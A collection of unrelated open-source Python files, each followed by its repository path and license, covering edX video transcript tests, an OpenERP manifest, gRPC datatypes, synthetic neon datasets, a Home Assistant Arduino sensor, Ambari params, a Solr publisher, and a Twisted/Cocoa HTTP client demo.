And I open tab "Advanced"
And I add a language "uk" but do not upload an .srt file
And I save changes
When I view the video language menu
Then I am not able to see the language "uk" translation language
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
language_code = 'uk'
self.video.click_button('translation_add')
translations_count = self.video.translations_count()
self.video.select_translation_language(language_code, translations_count - 1)
self.save_unit_settings()
self.assertNotIn(language_code, list(self.video.caption_languages.keys()))
def test_upload_large_transcript(self):
"""
Scenario: User can upload transcript file with > 1mb size
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "1mb_transcripts.srt" for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('1mb_transcripts.srt', 'uk')
self.save_unit_settings()
self.video.wait_for(self.video.is_captions_visible, 'Captions are visible', timeout=10)
unicode_text = u"Привіт, edX вітає вас."
self.assertIn(unicode_text, self.video.captions_lines())
def test_translations_download_works_w_saving(self):
"""
Scenario: Translations downloading works correctly w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I save changes
And I edit the component
And I open tab "Advanced"
And I see translations for "uk, zh"
And video language menu has "uk, zh" translations
Then I can download transcript for "zh" language code, that contains text "好 各位同学"
And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.edit_component()
self.open_advanced_tab()
self.assertEqual(sorted(self.video.translations()), sorted(['zh', 'uk']))
self.assertEqual(sorted(list(self.video.caption_languages.keys())), sorted(['zh', 'uk']))
zh_unicode_text = u"好 各位同学"
self.assertTrue(self.video.download_translation('zh', zh_unicode_text))
uk_unicode_text = u"Привіт, edX вітає вас."
self.assertTrue(self.video.download_translation('uk', uk_unicode_text))
def test_translations_download_works_wo_saving(self):
"""
Scenario: Translations downloading works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
Then I can download transcript for "zh" language code, that contains text "好 各位同学"
And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
zh_unicode_text = u"好 各位同学"
self.assertTrue(self.video.download_translation('zh', zh_unicode_text))
uk_unicode_text = u"Привіт, edX вітає вас."
self.assertTrue(self.video.download_translation('uk', uk_unicode_text))
def test_translations_remove_works_wo_saving(self):
"""
Scenario: Translations removing works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "uk_transcripts.srt" for "uk" language code
And I see translations for "uk"
Then I remove translation for "uk" language code
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.assertEqual(self.video.translations(), ['uk'])
self.video.remove_translation('uk')
confirm_prompt(self.video)
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_entry_remove_works(self):
"""
Scenario: Translations entry removal works correctly when transcript is not uploaded
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click on "+ Add" button for "Transcript Languages" field
Then I click on "Remove" button
And I see newly created entry is removed
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button("translation_add")
self.assertEqual(self.video.translations_count(), 1)
self.video.remove_translation("")
self.assertEqual(self.video.translations_count(), 0)
def test_cannot_upload_sjson_translation(self):
"""
Scenario: User cannot upload translations in sjson format
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click button "Add"
And I choose "uk" language code
And I try to upload transcript file "subs_3_yD_cEKoCk.srt.sjson"
Then I see validation error "Only SRT files can be uploaded. Please select a file ending in .srt to upload."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button('translation_add')
self.video.select_translation_language('uk')
self.video.upload_asset('subs_3_yD_cEKoCk.srt.sjson', asset_type='transcript')
error_msg = 'Only SRT files can be uploaded. Please select a file ending in .srt to upload.'
self.assertEqual(self.video.upload_status_message, error_msg)
def test_replace_translation_w_save(self):
"""
Scenario: User can easy replace the translation by another one w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
And I replace transcript file for "zh" language code by "uk_transcripts.srt"
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"好 各位同学"
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"Привіт, edX вітає вас."
self.assertIn(unicode_text, self.video.captions_text)
def test_replace_translation_wo_save(self):
"""
Scenario: User can easy replace the translation by another one w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I see translations for "zh"
And I replace transcript file for "zh" language code by "uk_transcripts.srt"
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.assertEqual(self.video.translations(), ['zh'])
self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"Привіт, edX вітає вас."
self.assertIn(unicode_text, self.video.captions_text)
def test_translation_upload_remove_upload(self):
"""
Scenario: Upload "zh" file "A" -> Remove "zh" -> Upload "zh" file "B"
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I see translations for "zh"
Then I remove translation for "zh" language code
And I upload transcript file "uk_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.assertEqual(self.video.translations(), ['zh'])
self.video.remove_translation('zh')
confirm_prompt(self.video)
self.video.upload_translation('uk_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"Привіт, edX вітає вас."
self.assertIn(unicode_text, self.video.captions_text)
def test_select_language_twice(self):
"""
Scenario: User cannot select the same language twice
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click button "Add"
And I choose "zh" language code
And I click button "Add"
Then I cannot choose "zh" language code
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button('translation_add')
self.video.select_translation_language('zh')
self.video.click_button('translation_add')
self.assertTrue(self.video.is_language_disabled('zh'))
def test_table_of_contents(self):
"""
Scenario: User can see Abkhazian (ab) language option at the first position
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|table |chinese_transcripts.srt|
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And video language menu has "table, uk" translations
And I see video language with code "table" at position "0"
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'ab')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"好 各位同学"
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(sorted(list(self.video.caption_languages.keys())), sorted([u'ab', u'uk']))
self.assertEqual(sorted(list(self.video.caption_languages.keys()))[0], 'ab')
def test_upload_transcript_with_BOM(self):
"""
Scenario: User can upload transcript file with BOM(Byte Order Mark) in it.
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts_with_BOM.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "莎拉·佩林 (Sarah Palin)" text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts_with_BOM.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"莎拉·佩林 (Sarah Palin)"
self.assertIn(unicode_text, self.video.captions_lines())
def test_simplified_and_traditional_chinese_transcripts_uploading(self):
"""
Scenario: Translations uploading works correctly
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "simplified_chinese.srt" for "zh_HANS" language code
And I save changes
Then when I view the video it does show the captions
And I see "在线学习是革" text in the captions
And I edit the component
And I open tab "Advanced"
And I upload transcript file "traditional_chinese.srt" for "zh_HANT" language code
And I save changes
Then when I view the video it does show the captions
And I see "在線學習是革" text in the captions
And video subtitle menu has 'zh_HANS', 'zh_HANT' translations for 'Simplified Chinese'
and 'Traditional Chinese' respectively
"""
self._create_video_component()
langs_info = [
('zh_HANS', 'simplified_chinese.srt', u'在线学习是革'),
('zh_HANT', 'traditional_chinese.srt', u'在線學習是革')
]
for lang_code, lang_file, lang_text in langs_info:
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation(lang_file, lang_code)
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
# If there is only one language then there will be no subtitle/captions menu
if lang_code == u'zh_HANT':
self.video.select_language(lang_code)
unicode_text = lang_text
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages, {'zh_HANS': 'Simplified Chinese', 'zh_HANT': 'Traditional Chinese'})
| edx-solutions/edx-platform | common/test/acceptance/tests/video/test_studio_video_editor.py | Python | agpl-3.0 | 20,547 |
# -*- coding: utf-8 -*-
{ 'sequence': 500,
"name" : "ChriCar unique View ID"
, "version" : "0.2"
, "author" : "Network Gulf IT - India"
, "website" : "http://www.chricar.at/ChriCar/index.html"
, "description" : """
This module is funded by
| ChriCar Beteiligungs- und Beratungs- GmbH
| http://www.chricar.at/ChriCar/index.html
Developed by
| Network Gulf IT - India
| http://www.networkgulf.com/
usage: get_id('your_view_name',param1,param2,param3,param4)
This function will always return the SAME unique id for a
certain combination of parameters for a view.
Hint 1: you do not need this function if the unique id can easily be
calculated during the grouping. Example:
- easy: group by product_id
- more complex: group by account_id, period_id
- very complex: group by account_id, period_id, currency_id
Hint 2: for large tables (100000 rec) performance gain of factor 10x and more
split the grouping operation and the get_id into 2 views
slow:
| select get_id(tablename,param1,param2,...), param1, param2, ... sum(field1), ...
| from
| group by get_id(tablename,param1,param2,...) ,param1,param2,...
fast:
1) view1:
| select ....
| from
| group by param1,param2,...
2) view2:
| select get_id('view1',param1,param2,...),* from view1;
| (no group by here)
"""
, "depends" : ["base"]
, "init_xml" : []
, "demo" : []
, "data" : []
, "auto_install" : False
, 'installable': False
, 'application' : False
}
| VitalPet/c2c-rd-addons | chricar_view_id/__openerp__.py | Python | agpl-3.0 | 1,460 |
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Datatypes passed between Python and C code."""
import collections
import enum
@enum.unique
class Code(enum.IntEnum):
"""One Platform error codes (see status.h and codes.proto)."""
OK = 0
CANCELLED = 1
UNKNOWN = 2
INVALID_ARGUMENT = 3
EXPIRED = 4
NOT_FOUND = 5
ALREADY_EXISTS = 6
PERMISSION_DENIED = 7
UNAUTHENTICATED = 16
RESOURCE_EXHAUSTED = 8
FAILED_PRECONDITION = 9
ABORTED = 10
OUT_OF_RANGE = 11
UNIMPLEMENTED = 12
INTERNAL_ERROR = 13
UNAVAILABLE = 14
DATA_LOSS = 15
class Status(collections.namedtuple('Status', ['code', 'details'])):
"""Describes an RPC's overall status."""
class ServiceAcceptance(
collections.namedtuple(
'ServiceAcceptance', ['call', 'method', 'host', 'deadline'])):
"""Describes an RPC on the service side at the start of service."""
class Event(
collections.namedtuple(
'Event',
['kind', 'tag', 'write_accepted', 'complete_accepted',
'service_acceptance', 'bytes', 'status', 'metadata'])):
"""Describes an event emitted from a completion queue."""
@enum.unique
class Kind(enum.Enum):
"""Describes the kind of an event."""
STOP = object()
WRITE_ACCEPTED = object()
COMPLETE_ACCEPTED = object()
SERVICE_ACCEPTED = object()
READ_ACCEPTED = object()
METADATA_ACCEPTED = object()
FINISH = object()
| gameduell/kythe | third_party/grpc/src/python/src/grpc/_adapter/_datatypes.py | Python | apache-2.0 | 2,884 |
# ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Datasets with fake data for testing purposes.
"""
import logging
import numpy as np
from neon.datasets.dataset import Dataset
from neon.util.compat import range
logger = logging.getLogger(__name__)
class UniformRandom(Dataset):
"""
Sets up a synthetic uniformly random dataset.
Attributes:
inputs (dict): structure housing the loaded train/test/validation
input data
targets (dict): structure housing the loaded train/test/validation
target data
"""
def __init__(self, ntrain, ntest, nin, nout, **kwargs):
self.__dict__.update(kwargs)
self.ntrain = ntrain
self.ntest = ntest
self.nin = nin
self.nout = nout
self.macro_batched = False
np.random.seed(0)
def load_data(self, shape):
data = np.random.uniform(low=0.0, high=1.0, size=shape)
labels = np.random.randint(low=0, high=self.nout, size=shape[0])
onehot = np.zeros((len(labels), self.nout), dtype='float32')
for col in range(self.nout):
onehot[:, col] = (labels == col)
return (data, onehot)
def load(self, backend=None, experiment=None):
self.inputs['train'], self.targets['train'] = (
self.load_data((self.ntrain, self.nin)))
self.inputs['test'], self.targets['test'] = (
self.load_data((self.ntest, self.nin)))
self.format()
class ToyImages(Dataset):
"""
Sets up a synthetic image classification dataset.
Attributes:
inputs (dict): structure housing the loaded train/test/validation
input data
targets (dict): structure housing the loaded train/test/validation
target data
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
self.macro_batched = False
self.ntrain = 128
self.ntest = 128
self.ifmheight = 32
self.ifmwidth = self.ifmheight
self.maxrad = self.ifmwidth / 2
self.minrad = self.ifmwidth / 8
self.nifm = 3
self.nin = self.nifm * self.ifmheight * self.ifmwidth
self.nout = 2
assert self.ifmheight % 2 == 0
assert self.ifmwidth % 2 == 0
self.center = (self.ifmwidth / 2, self.ifmheight / 2)
np.random.seed(0)
def ellipse(self, canvas, xrad, yrad):
rcanvas = canvas.reshape((self.nifm, self.ifmheight, self.ifmwidth))
smooth = 10
angs = np.linspace(0, 2 * np.pi, smooth * 360)
si = np.sin(angs)
co = np.cos(angs)
xvals = np.int32(xrad * co) + self.center[0]
yvals = np.int32(yrad * si) + self.center[1]
for fm in range(self.nifm):
rcanvas[fm, xvals, yvals] = np.random.randint(256)
def circle(self, canvas, rad):
self.ellipse(canvas, rad, rad)
def load_data(self, shape):
data = np.zeros(shape, dtype='float32')
labels = np.zeros(shape[0], dtype='float32')
ncircles = shape[0] / 2
for row in range(0, ncircles):
# Make circles.
rad = np.random.randint(self.minrad, self.maxrad)
self.circle(data[row], rad)
for row in range(ncircles, shape[0]):
# Make ellipses.
while True:
xrad, yrad = np.random.randint(self.minrad, self.maxrad, 2)
if xrad != yrad:
break
self.ellipse(data[row], xrad, yrad)
labels[row] = 1
data /= 255
onehot = np.zeros((len(labels), self.nout), dtype='float32')
for col in range(self.nout):
onehot[:, col] = (labels == col)
return (data, onehot)
def load(self, backend=None, experiment=None):
ntotal = self.ntrain + self.ntest
inds = np.arange(ntotal)
np.random.shuffle(inds)
data, targets = self.load_data((ntotal, self.nin))
self.inputs['train'] = data[inds[:self.ntrain]]
self.targets['train'] = targets[inds[:self.ntrain]]
self.inputs['test'] = data[inds[self.ntrain:]]
self.targets['test'] = targets[inds[self.ntrain:]]
self.format()
| ml-lab/neon | neon/datasets/synthetic.py | Python | apache-2.0 | 4,940 |
"""Support for getting information from Arduino pins."""
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.components import arduino
from homeassistant.const import CONF_NAME
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
CONF_PINS = "pins"
CONF_TYPE = "analog"
PIN_SCHEMA = vol.Schema({vol.Required(CONF_NAME): cv.string})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_PINS): vol.Schema({cv.positive_int: PIN_SCHEMA})}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Arduino platform."""
if arduino.BOARD is None:
_LOGGER.error("A connection has not been made to the Arduino board")
return False
pins = config.get(CONF_PINS)
sensors = []
for pinnum, pin in pins.items():
sensors.append(ArduinoSensor(pin.get(CONF_NAME), pinnum, CONF_TYPE))
add_entities(sensors)
class ArduinoSensor(Entity):
"""Representation of an Arduino Sensor."""
def __init__(self, name, pin, pin_type):
"""Initialize the sensor."""
self._pin = pin
self._name = name
self.pin_type = pin_type
self.direction = "in"
self._value = None
arduino.BOARD.set_mode(self._pin, self.direction, self.pin_type)
@property
def state(self):
"""Return the state of the sensor."""
return self._value
@property
def name(self):
"""Get the name of the sensor."""
return self._name
def update(self):
"""Get the latest value from the pin."""
self._value = arduino.BOARD.get_analog_inputs()[self._pin][1]
| fbradyirl/home-assistant | homeassistant/components/arduino/sensor.py | Python | apache-2.0 | 1,767 |
# Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shortcut methods for getting set up with Google Cloud Storage.
You'll typically use these to get started with the API:
.. literalinclude:: snippets.py
:start-after: [START storage_get_started]
:end-before: [END storage_get_started]
The main concepts with this API are:
- :class:`~google.cloud.storage.bucket.Bucket` which represents a particular
bucket (akin to a mounted disk on a computer).
- :class:`~google.cloud.storage.blob.Blob` which represents a pointer to a
particular entity in Cloud Storage (akin to a file path on a remote
machine).
"""
from pkg_resources import get_distribution
__version__ = get_distribution("google-cloud-storage").version
from google.cloud.storage.batch import Batch
from google.cloud.storage.blob import Blob
from google.cloud.storage.bucket import Bucket
from google.cloud.storage.client import Client
__all__ = ["__version__", "Batch", "Blob", "Bucket", "Client"]
| dhermes/gcloud-python | storage/google/cloud/storage/__init__.py | Python | apache-2.0 | 1,504 |
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ambari_commons import OSCheck
from resource_management.libraries.functions import format
from resource_management.libraries.functions.default import default
from resource_management.libraries.functions.version import format_stack_version
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions import get_kinit_path
from resource_management.libraries.script.script import Script
# a map of the Ambari role to the component name
# for use with <stack-root>/current/<component>
SERVER_ROLE_DIRECTORY_MAP = {
'ZOOKEEPER_SERVER' : 'zookeeper-server',
'ZOOKEEPER_CLIENT' : 'zookeeper-client'
}
component_directory = Script.get_component_from_role(SERVER_ROLE_DIRECTORY_MAP, "ZOOKEEPER_CLIENT")
config = Script.get_config()
if OSCheck.is_windows_family():
zookeeper_win_service_name = "zkServer"
else:
zk_pid_dir = config['configurations']['zookeeper-env']['zk_pid_dir']
zk_pid_file = format("{zk_pid_dir}/zookeeper_server.pid")
# Security related/required params
hostname = config['hostname']
security_enabled = config['configurations']['cluster-env']['security_enabled']
kinit_path_local = get_kinit_path(default('/configurations/kerberos-env/executable_search_paths', None))
tmp_dir = Script.get_tmp_dir()
zk_user = config['configurations']['zookeeper-env']['zk_user']
stack_version_unformatted = str(config['hostLevelParams']['stack_version'])
stack_version_formatted = format_stack_version(stack_version_unformatted)
stack_root = Script.get_stack_root()
config_dir = "/etc/zookeeper/conf"
if stack_version_formatted and check_stack_feature(StackFeature.ROLLING_UPGRADE, stack_version_formatted):
config_dir = format("{stack_root}/current/{component_directory}/conf")
stack_name = default("/hostLevelParams/stack_name", None) | arenadata/ambari | ambari-server/src/main/resources/stacks/ADH/1.0/services/ZOOKEEPER/package/scripts/status_params.py | Python | apache-2.0 | 2,702 |
#!/usr/bin/python
#from openflow.optin_manager.sfa.util.sfalogging import logger
class RSpecVersion:
type = None
content_type = None
version = None
schema = None
namespace = None
extensions = {}
namespaces = dict(extensions.items() + [('default', namespace)])
elements = []
enabled = False
def __init__(self, xml=None):
self.xml = xml
def to_dict(self):
return {
'type': self.type,
'version': self.version,
'schema': self.schema,
'namespace': self.namespace,
'extensions': self.extensions.values()
}
def __str__(self):
return "%s %s" % (self.type, self.version)
| dana-i2cat/felix | optin_manager/src/python/openflow/optin_manager/sfa/rspecs/version.py | Python | apache-2.0 | 712 |
import httplib
import logging
#import traceback
from xml.etree.ElementTree import _escape_cdata
from pypes.component import Component
log = logging.getLogger(__name__)
class Solr(Component):
__metatype__ = 'PUBLISHER'
def __init__(self):
# initialize parent class
Component.__init__(self)
# remove the output port since this is a publisher
self.remove_output('out')
# solr host, port, and path (core)
self.set_parameter('host', 'localhost')
self.set_parameter('port', 8983)
self.set_parameter('path', '/solr')
# if we should commit after each batch
# set to OFF if using the auto commit feature
self.set_parameter('commit', 'True', ['True', 'False'])
# wait_flush and wait_searcher
self.set_parameter('wait_flush', 'True', ['True', 'False'])
self.set_parameter('wait_searcher', 'True', ['True', 'False'])
# overwrite previously commited docs with same id
self.set_parameter('overwrite', 'True', ['True', 'False'])
# commit within time in milliseconds (0 = disabled)
self.set_parameter('commit_within', '0')
# log successful initialization message
log.info('Component Initialized: %s' % self.__class__.__name__)
def _escape(self, val):
result = None
if isinstance(val, (str, unicode)):
result = _escape_cdata(val)
else:
try:
strval = val.__str__()
except:
pass
else:
result = _escape_cdata(strval)
return result
def run(self):
# Define our components entry point
while True:
# get parameters outside doc loop for better performace
try:
host = self.get_parameter('host')
if host is None:
raise ValueError, 'Host not set'
port = self.get_parameter('port')
if port is None:
raise ValueError, 'Port not set'
else:
port = int(port)
path = self.get_parameter('path')
if path is None:
raise ValueError, 'Path not set'
commit = self.get_parameter('commit')
if commit is None:
raise ValueError, 'Commit not set'
commit_within = self.get_parameter('commit_within')
if commit_within is None:
raise ValueError, 'Commit Within not set'
wait_flush = self.get_parameter('wait_flush')
if wait_flush is None:
raise ValueError, 'Wait Flush not set'
wait_searcher = self.get_parameter('wait_searcher')
if wait_searcher is None:
raise ValueError, 'Wait Searcher not set'
overwrite = self.get_parameter('overwrite')
if overwrite is None:
raise ValueError, 'Overwrite not set'
# convert to booleans
if commit == 'True':
commit = True
else:
commit = False
if wait_flush == 'True':
wait_flush = True
else:
wait_flush = False
if wait_searcher == 'True':
wait_searcher = True
else:
wait_searcher = False
if overwrite == 'True':
overwrite = True
else:
overwrite = False
# validate commit within value
try:
commit_within = int(commit_within)
if commit_within < 0:
raise ValueError
except:
log.warn('Commit Within invalid, using default')
commit_within = 0
# strip trailing slash from path
if path.endswith('/'):
path = path[:-1]
except Exception as e:
log.error('Component Failed: %s' % self.__class__.__name__)
log.error('Reason: %s' % str(e))
self.yield_ctrl()
continue # so next time we are called we continue at the top
# for each document waiting on our input port
cnt = 0
writebuf = []
for doc in self.receive_all('in'):
cnt = cnt + 1
try:
# check for a document boost
try:
boost = float(doc.get_meta('boost'))
except:
boost = 1
writebuf.append('<doc%s>' % ( \
' boost="%s">' % boost if boost > 1 else ''))
for key, vals in doc:
# see if we need to do a field boost
try:
fboost = float(doc.get_meta('boost', attr=key))
except:
fboost = 1
for val in vals:
escaped = self._escape(val)
if val is None:
log.warn('Invalid value in field %s' % key)
continue
writebuf.append('\t<field name="%s"%s>' \
'<![CDATA[%s]]></field>' % (key,
' boost="%s"' % fboost if fboost > 1 else '',
escaped))
writebuf.append('</doc>')
except Exception as e:
log.error('Component Failed: %s' % self.__class__.__name__)
log.error('Reason: %s' % str(e))
#log.error(traceback.print_exc())
# decrement the failed document
cnt = cnt - 1
# check if we have a batch of documents to submit to solr
if cnt > 0:
batch = '<add%s%s>\n%s\n</add>\n' % ( \
' overwrite="false"' if not overwrite else '',
' commitWithin="%s"' % commit_within if commit_within > 0 \
else '', '\n'.join(writebuf))
conn = None
try:
headers = {'Content-Type': 'text/xml; charset=utf-8'}
updatepth = '%s/update' % path
conn = httplib.HTTPConnection(host, port)
conn.request('POST', updatepth,
batch.encode('utf-8'), headers)
res = conn.getresponse()
if res.status != 200:
raise ValueError, res.reason
commitstr = '<commit%s%s />' % ( \
' waitFlush="false"' if not wait_flush else '',
' waitSearcher="false"' if not wait_searcher else '')
if commit:
conn.request('POST', updatepth, commitstr, headers)
# the following causes a ResponseNotReady exception
#res = conn.getresponse()
#if res.status != 200:
# raise ValueError, res.reason
except Exception as e:
log.error('Solr batch submission failed')
log.error('Reason: %s' % str(e))
#log.error(traceback.print_exc())
finally:
if conn is not None:
conn.close()
else:
log.info('No documents to submit to Solr')
# yield the CPU, allowing another component to run
self.yield_ctrl()
| klyap/pypes | ui/pypesvds/plugins/solrpublisher/solrpublisher.py | Python | apache-2.0 | 8,171 |
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
# import needed classes/functions from Cocoa
from Foundation import *
from AppKit import *
# import Nib loading functionality from AppKit
from PyObjCTools import NibClassBuilder, AppHelper
from twisted.internet import _threadedselect
_threadedselect.install()
from twisted.internet import reactor, protocol
from twisted.web import http
from twisted.python import log
import sys, urlparse
# create ObjC classes as defined in MainMenu.nib
NibClassBuilder.extractClasses("MainMenu")
class TwistzillaClient(http.HTTPClient):
def __init__(self, delegate, urls):
self.urls = urls
self.delegate = delegate
def connectionMade(self):
self.sendCommand('GET', str(self.urls[2]))
self.sendHeader('Host', '%s:%d' % (self.urls[0], self.urls[1]))
self.sendHeader('User-Agent', 'CocoaTwistzilla')
self.endHeaders()
def handleResponse(self, data):
self.delegate.gotResponse_(data)
class MyAppDelegate(NibClassBuilder.AutoBaseClass):
def gotResponse_(self, html):
s = self.resultTextField.textStorage()
s.replaceCharactersInRange_withString_((0, s.length()), html)
self.progressIndicator.stopAnimation_(self)
def doTwistzillaFetch_(self, sender):
s = self.resultTextField.textStorage()
s.deleteCharactersInRange_((0, s.length()))
self.progressIndicator.startAnimation_(self)
u = urlparse.urlparse(self.messageTextField.stringValue())
pos = u[1].find(':')
if pos == -1:
host, port = u[1], 80
else:
host, port = u[1][:pos], int(u[1][pos+1:])
if u[2] == '':
fname = '/'
else:
fname = u[2]
host = host.encode('utf8')
fname = fname.encode('utf8')
protocol.ClientCreator(reactor, TwistzillaClient, self, (host, port, fname)).connectTCP(host, port).addErrback(lambda f:self.gotResponse_(f.getBriefTraceback()))
def applicationDidFinishLaunching_(self, aNotification):
"""
Invoked by NSApplication once the app is done launching and
immediately before the first pass through the main event
loop.
"""
